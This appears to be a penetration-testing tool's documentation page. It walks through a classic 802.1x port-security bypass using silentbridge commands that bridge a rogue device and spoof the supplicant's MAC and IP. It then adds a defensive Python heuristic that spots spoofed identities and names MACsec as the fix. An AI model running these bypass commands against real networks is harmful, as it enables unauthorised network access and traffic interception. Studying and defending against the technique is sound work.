Classic 802.1x Bypass
Effective against: 802.1x-2004, 802.1x-2001
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001 using either Device Configuration A or Device Configuration B.
Begin connecting your rogue device between the supplicant and authenticator as described in Device Placement.
Then, connect to your device using your side channel (see: Software Setup).
If you are using Device Configuration B, make sure both splitters are in the "connect" position by running the --splitterctl command:

```bash
# skip this if you are not using Device Configuration B
./silentbridge --splitterctl --upstream-splitter connect --phy-splitter connect
```
Next, use the --create-bridge command to create a simple transparent bridge:

```bash
# substitute eno1, eno2, and eno3 with the names of your upstream, PHY, and side channel interfaces
./silentbridge --create-bridge --upstream eno1 --phy eno2 --sidechannel eno3
```
That's it - you've just bypassed port security. You should be able to sniff traffic traveling to and from the supplicant.
Now that we've performed our initial bypass, let's give ourselves the capability to interact with devices on the network.
First, use tcpdump to gather the following data points:
- MAC address of default gateway
- IP address of supplicant
- MAC address of supplicant
- MAC address of switch
Then, use the --add-interaction flag to add network interaction to your bridge:

```bash
# replace the interface names, IPs, and MAC addresses below with the data gathered using tcpdump
./silentbridge --add-interaction --gw-mac d0:17:c2:3f:af:e0 --client-ip 192.168.1.81 --upstream eno1 --client-mac 38:60:32:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:09:85 --sidechannel eno3
```
Congrats - you can now interact with anything on the network except the supplicant.
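The interaction step above works because a second host is now transmitting under the supplicant's MAC and IP address, and a switch running 802.1x-2004 or 802.1x-2001 has no per-frame integrity check (that is what MACsec in 802.1x-2010 adds) to tell the two apart. On the monitoring side, one passive indicator of this situation is a single MAC/IP pair that produces frames with two different IP stack profiles, since the supplicant's own packets arrive with a single initial TTL and TCP window. The following Python is an added example, not part of silentbridge or of this page; the observation tuples are constructed sample data reusing the supplicant MAC and IP shown above, and the "initial TTL plus TCP window" profile is a deliberately simple stand-in for a real passive OS fingerprint.

```python
from collections import defaultdict

# Constructed sample of passive observations captured on the switch side of
# the port: (src_mac, src_ip, observed_ip_ttl, tcp_window). Not real capture data.
SAMPLE_OBSERVATIONS = [
    ("38:60:32:d0:ef:0b", "192.168.1.81", 128, 65535),  # supplicant's own stack
    ("38:60:32:d0:ef:0b", "192.168.1.81", 128, 65535),
    ("38:60:32:d0:ef:0b", "192.168.1.81", 64, 29200),   # second stack using the same identity
    ("38:60:32:d0:ef:0b", "192.168.1.81", 64, 29200),
    ("a4:5e:60:1b:22:3c", "192.168.1.90", 64, 29200),   # unrelated host, single consistent profile
]


def initial_ttl(ttl):
    """Round an observed TTL up to the nearest common initial value.

    Hosts on the same L2 segment have not been decremented by a router, so
    the observed TTL should equal the stack's initial value; rounding makes
    the check tolerant of a hop or two on the way to the sensor.
    """
    for base in (32, 64, 128, 255):
        if ttl <= base:
            return base
    return 255


def find_shared_identities(observations):
    """Return {(mac, ip): {(initial_ttl, window), ...}} for identities with >1 profile.

    An identity that shows more than one profile is the candidate for review:
    one MAC/IP pair should be backed by exactly one IP stack.
    """
    profiles = defaultdict(set)
    for mac, ip, ttl, window in observations:
        profiles[(mac, ip)].add((initial_ttl(ttl), window))
    return {ident: sigs for ident, sigs in profiles.items() if len(sigs) > 1}


if __name__ == "__main__":
    for (mac, ip), sigs in find_shared_identities(SAMPLE_OBSERVATIONS).items():
        print(f"{mac} / {ip} shows {len(sigs)} distinct stack profiles: {sorted(sigs)}")
```

Run against the sample, the supplicant identity is reported with two profiles while the unrelated host is not. In practice the profile should come from a proper passive fingerprinter and be correlated with the port the switch learned the MAC on; on its own the heuristic will also fire on legitimate dual-stack oddities such as a VM sharing its host's address, so treat a hit as a review trigger, not a verdict. The structural fix for this bypass class is 802.1x-2010 with MACsec, where a transparent bridge cannot produce frames the switch will accept.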